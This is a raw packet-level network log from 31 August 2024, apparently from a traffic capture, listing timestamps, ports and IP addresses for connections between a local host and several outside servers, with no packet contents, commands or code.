Aug 31, 2024 15:44:19.609607935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609618902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609628916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609637022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609647036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609662056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609674931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610418081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610430002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610439062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610466003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610491991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610572100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610583067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610593081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610626936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610634089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610645056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610652924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610665083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610691071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610728979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610739946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610754013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610764980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610774994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610783100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610785007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.610800982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610811949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.610837936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611378908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611428976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611448050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611458063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611488104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611496925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611561060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611571074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611581087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611593962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611603975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611608028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611613989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611630917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611632109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611641884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611650944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611654997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611661911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611673117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611677885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611682892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611694098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.611701012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611716032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.611735106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.612353086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612404108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.612409115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612449884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.612494946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612505913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612514019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612524033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612535000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612543106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.612546921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.612570047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.612581015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.670922995 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.674479961 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:19.679361105 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:19.694273949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694329977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.694428921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694442034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694458961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694470882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694480896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694490910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694495916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.694508076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.694518089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.694534063 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.694555044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.695722103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695732117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695741892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695775032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.695796013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695805073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.695807934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695817947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695826054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695841074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.695847034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.695863962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.695874929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697271109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697279930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697285891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697326899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697335005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697345972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697356939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697366953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697375059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697379112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697406054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697406054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697427988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697485924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697535038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697568893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697633028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697649002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697658062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697666883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697673082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697684050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697696924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697705030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697705984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.697726965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697748899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.697762966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698316097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698327065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698335886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698368073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698384047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698462963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698473930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698483944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698513031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698534012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698540926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698544979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698569059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698580980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698591948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698604107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698612928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698642015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698659897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698760033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698769093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698780060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698788881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698801994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698805094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698817015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.698941946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698952913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698962927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698972940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.698977947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699002981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699018002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699145079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699156046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699166059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699173927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699197054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699208021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699750900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699768066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699778080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699788094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699799061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699811935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699836969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699912071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699923038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.699963093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.699986935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700035095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700038910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700051069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700074911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700092077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700213909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700225115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700239897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700249910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700259924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700263023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700270891 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.700289011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700299978 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.700308084 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700310946 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.700318098 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.700321913 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.700333118 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.700357914 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.700365067 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.700479031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700494051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700514078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700527906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700529099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700540066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700551987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700555086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700562954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700575113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700592041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700620890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700658083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700670004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700680971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700695038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700707912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700710058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700721025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700731039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700733900 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.700752974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700781107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.700792074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700828075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.700843096 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.701385021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701438904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701448917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701468945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701482058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701572895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701585054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701596022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701606989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701621056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701632023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701646090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701664925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701875925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701888084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701898098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701909065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701920033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701924086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701937914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701951027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701957941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701967001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.701978922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.701999903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702013969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702613115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702661991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702675104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702739000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702749014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702759981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702770948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702783108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702794075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702799082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702805996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702830076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702837944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702841043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702850103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702884912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702888966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702900887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702910900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.702934027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.702946901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.703005075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703016996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703064919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.703268051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703309059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703320980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703341007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.703357935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.703385115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.703427076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703438997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703450918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703473091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.703500032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.703527927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703538895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.703582048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.710521936 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.711349964 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:19.716124058 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.739073038 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.739084959 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.739095926 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.739136934 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.739177942 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.739675999 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.739748001 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.744402885 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.744456053 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.744477034 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.744508028 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.744529009 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.744560003 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.745048046 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.745131969 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.785200119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785212040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785223007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785243988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785255909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785255909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.785268068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785279989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785294056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.785303116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.785321951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.785332918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.786389112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786401987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786412954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786443949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.786472082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.786848068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786860943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786875963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786886930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786895990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.786904097 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.786931992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.786953926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788224936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788237095 CEST	80	49727	52.212.52.84	192.168.2.5
